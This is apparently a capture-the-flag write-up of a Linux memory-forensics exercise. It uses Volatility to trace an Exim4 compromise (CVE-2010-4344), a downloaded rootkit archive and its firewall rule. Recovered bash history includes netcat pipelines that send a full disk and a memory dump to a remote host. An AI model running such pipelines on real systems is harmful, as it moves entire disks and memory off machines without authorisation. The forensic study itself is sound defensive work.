2042 bash 2011-02-06 14:04:39 UTC+0000 vi .ssh/known_hosts
2042 bash 2011-02-06 14:04:39 UTC+0000 vi .bash_history
2042 bash 2011-02-06 14:04:39 UTC+0000 vi update-exim4.conf.conf
2042 bash 2011-02-06 14:04:39 UTC+0000 update-exim4.conf
2042 bash 2011-02-06 14:04:39 UTC+0000 halt
2042 bash 2011-02-06 14:04:39 UTC+0000 reboot
2042 bash 2011-02-06 14:04:39 UTC+0000 whereis gcc
2042 bash 2011-02-06 14:04:39 UTC+0000 whereis memdump
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get install memdump
2042 bash 2011-02-06 14:04:39 UTC+0000 halt
2042 bash 2011-02-06 14:04:39 UTC+0000 ifconfig
2042 bash 2011-02-06 14:04:39 UTC+0000 ping 192.168.56.1
2042 bash 2011-02-06 14:04:39 UTC+0000 mount
2042 bash 2011-02-06 14:04:39 UTC+0000 sudo dd if=/dev/sda | nc 192.168.56.1 4444
2042 bash 2011-02-06 14:04:39 UTC+0000 dd if=/dev/sda | nc 192.168.56.1 4444
2042 bash 2011-02-06 14:04:39 UTC+0000 dd if=/dev/sda1 | nc 192.168.56.1 4444
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get install memdump
2042 bash 2011-02-06 14:04:39 UTC+0000 netstat -ant
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get install ddrescue
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get install dcfldd
2042 bash 2011-02-06 14:04:39 UTC+0000 ls /dev/kmem
2042 bash 2011-02-06 14:04:39 UTC+0000 ls /dev/mem
2042 bash 2011-02-06 14:04:39 UTC+0000 halt
2042 bash 2011-02-06 14:04:39 UTC+0000 ifconfig
2042 bash 2011-02-06 14:04:39 UTC+0000 ifconfig
2042 bash 2011-02-06 14:04:39 UTC+0000 reboot
2042 bash 2011-02-06 14:04:46 UTC+0000 ifconfig
2042 bash 2011-02-06 14:24:43 UTC+0000 dd if=/dev/sda1 | nc 192.168.56.1 8888
2042 bash 2011-02-06 14:42:29 UTC+0000 memdump | nc 192.168.56.1 8888
remnux@remnux:~/Downloads/Ulysses$
exim4 is being tinkered with all over this history, so this must be it.
Ans: Exim4
What is the CVE number of exploited vulnerability?
Since exim4-base_4.69-9 was downloaded, I look into vulnerabilities for this version. That turns up the following article. It must be the CVE for this RCE.
Ans: CVE-2010-4344
During this attack, the attacker downloaded two files to the server. Provide the name of the compressed file.
Enumerate files whose names match the pattern ??.??? with linux_enumerate_files.
remnux@remnux:~/Downloads/Ulysses$ vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_enumerate_files | grep "..\....$"
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
from cryptography.hazmat.backends.openssl import backend
0xcf1e2e48 39467 /tmp/rk.tar
0x0 ------------------------- /var/spool/exim4/s.c.gch
0xcf1364ac 8318 /var/log/news/news.err
0xcf136a70 8312 /var/log/mail.err
0xcf1340d4 8307 /var/log/user.log
0xcf1342c0 8306 /var/log/mail.log
0xcf1344ac 8305 /var/log/lpr.log
0xcf134698 8302 /var/log/kern.log
0xcf134884 8301 /var/log/daemon.log
0xcf134c5c 8296 /var/log/auth.log
0xcf11a884 7503 /var/run/portmap.pid
0xcf15a0d4 8294 /var/run/crond.pid
0xcf11c884 8278 /var/run/rpc.statd.pid
0x0 ------------------------- /usr/include/gnu/stubs-32.h.gch
0x0 ------------------------- /usr/include/gnu/stubs.h.gch
0x0 ------------------------- /usr/include/bits/wordsize.h.gch
0x0 ------------------------- /usr/include/sys/cdefs.h.gch
0x0 ------------------------- /usr/include/features.h.gch
0x0 ------------------------- /usr/include/stdio.h.gch
0xcf2542c0 27638 /usr/lib/libgmp.so.3.4.2
0xcf254698 27642 /usr/lib/libmpfr.so.1.1.1
0x0 ------------------------- /usr/lib/gcc/i486-linux-gnu/4.3/include-fixed/features.h.gch
0x0 ------------------------- /usr/lib/gcc/i486-linux-gnu/4.3/include-fixed/stdio.h.gch
0x0 ------------------------- /usr/lib/gcc/i486-linux-gnu/4.3/include/stddef.h.gch
0x0 ------------------------- /usr/lib/gcc/i486-linux-gnu/4.3/include/features.h.gch
0x0 ------------------------- /usr/lib/gcc/i486-linux-gnu/4.3/include/stdio.h.gch
0xcf2570d4 21854 /usr/lib/gcc/i486-linux-gnu/4.3.2
0x0 ------------------------- /usr/lib/perl/5.10.0/vars.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/File/Spec.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/Fcntl.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/IO.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/SelectSaver.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/Symbol.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/IO/Handle.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/IO/Seekable.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/IO/File.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/strict.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/FileHandle.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/XSLoader.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/warnings.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/Exporter.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/Carp.pmc
0x0 ------------------------- /usr/lib/perl/5.10.0/Socket.pmc
0x0 ------------------------- /usr/lib/perl5/vars.pmc
0x0 ------------------------- /usr/lib/perl5/Fcntl.pmc
0x0 ------------------------- /usr/lib/perl5/IO.pmc
0x0 ------------------------- /usr/lib/perl5/SelectSaver.pmc
0x0 ------------------------- /usr/lib/perl5/Symbol.pmc
0x0 ------------------------- /usr/lib/perl5/strict.pmc
0x0 ------------------------- /usr/lib/perl5/FileHandle.pmc
0x0 ------------------------- /usr/lib/perl5/XSLoader.pmc
0x0 ------------------------- /usr/lib/perl5/warnings.pmc
0x0 ------------------------- /usr/lib/perl5/Exporter.pmc
0x0 ------------------------- /usr/lib/perl5/Carp.pmc
0x0 ------------------------- /usr/lib/perl5/Socket.pmc
0xcf1552c0 25174 /usr/lib/libgcrypt.so.11.4.4
0xcf155698 25167 /usr/lib/libgpg-error.so.0.3.0
0xcf155e48 25183 /usr/lib/libgnutls.so.26.4.6
0xcf13f4ac 23221 /usr/lib/libkrb5support.so.0.1
0xcf13f884 23220 /usr/lib/libk5crypto.so.3.1
0xcf13fc5c 23218 /usr/lib/libkrb5.so.3.3
0xcf13d0d4 23219 /usr/lib/libgssapi_krb5.so.2.2
0xcf1324ac 24264 /usr/lib/libz.so.1.2.3.3
0x0 ------------------------- /usr/lib/i486-linux-gnu/4.3.2
0xcf16a2c0 38010 /usr/lib/i686/cmov/libssl.so.0.9.8
0xcf13dc5c 38011 /usr/lib/i686/cmov/libcrypto.so.0.9.8
0x0 ------------------------- /usr/local/include/stddef.h.gch
0x0 ------------------------- /usr/local/include/features.h.gch
0x0 ------------------------- /usr/local/include/stdio.h.gch
0x0 ------------------------- /usr/share/perl/5.10.0/Exporter/Heavy.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/vars.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/File/Spec/Unix.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/File/Spec.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/SelectSaver.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/Symbol.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/strict.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/FileHandle.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/warnings.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/warnings/register.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/Exporter.pmc
0x0 ------------------------- /usr/share/perl/5.10.0/Carp.pmc
0x0 ------------------------- /usr/share/perl5/vars.pmc
0x0 ------------------------- /usr/share/perl5/Fcntl.pmc
0x0 ------------------------- /usr/share/perl5/IO.pmc
0x0 ------------------------- /usr/share/perl5/SelectSaver.pmc
0x0 ------------------------- /usr/share/perl5/Symbol.pmc
0x0 ------------------------- /usr/share/perl5/strict.pmc
0x0 ------------------------- /usr/share/perl5/FileHandle.pmc
0x0 ------------------------- /usr/share/perl5/XSLoader.pmc
0x0 ------------------------- /usr/share/perl5/warnings.pmc
0x0 ------------------------- /usr/share/perl5/Exporter.pmc
0x0 ------------------------- /usr/share/perl5/Carp.pmc
0x0 ------------------------- /usr/share/perl5/Socket.pmc
0x0 ------------------------- /etc/perl/vars.pmc
0x0 ------------------------- /etc/perl/Fcntl.pmc
0x0 ------------------------- /etc/perl/IO.pmc
0x0 ------------------------- /etc/perl/SelectSaver.pmc
0x0 ------------------------- /etc/perl/Symbol.pmc
0x0 ------------------------- /etc/perl/strict.pmc
0x0 ------------------------- /etc/perl/FileHandle.pmc
0x0 ------------------------- /etc/perl/XSLoader.pmc
0x0 ------------------------- /etc/perl/warnings.pmc
0x0 ------------------------- /etc/perl/Exporter.pmc
0x0 ------------------------- /etc/perl/Carp.pmc
0x0 ------------------------- /etc/perl/Socket.pmc
0xcf100698 29184 /lib/libcom_err.so.2.1
0xcf11aa70 30497 /lib/libwrap.so.0.7.6
0x0 ------------------------- /lib/i486-linux-gnu/4.3.2
0xcf02c698 29170 /lib/libncurses.so.5.7
remnux@remnux:~/Downloads/Ulysses$
Ans: rk.tar
Two ports were involved in the process of data exfiltration. Provide the port number of the highest one.
The destination ports were already visible in the linux_bash output.
Ans: 8888
Which port did the attacker try to block on the firewall?
Looking at the /tmp directory where that suspicious tar file lives, it looked like this.
Extract the rk.tar from before.
Going through its contents, I find a command in install.sh that manipulates iptables.
Ans: 45295
Closing thoughts
This makes for a good refresher on volatility2.
Unlike Windows, Linux profiles are not recognized on REMnux unless you install them, which occasionally catches me out.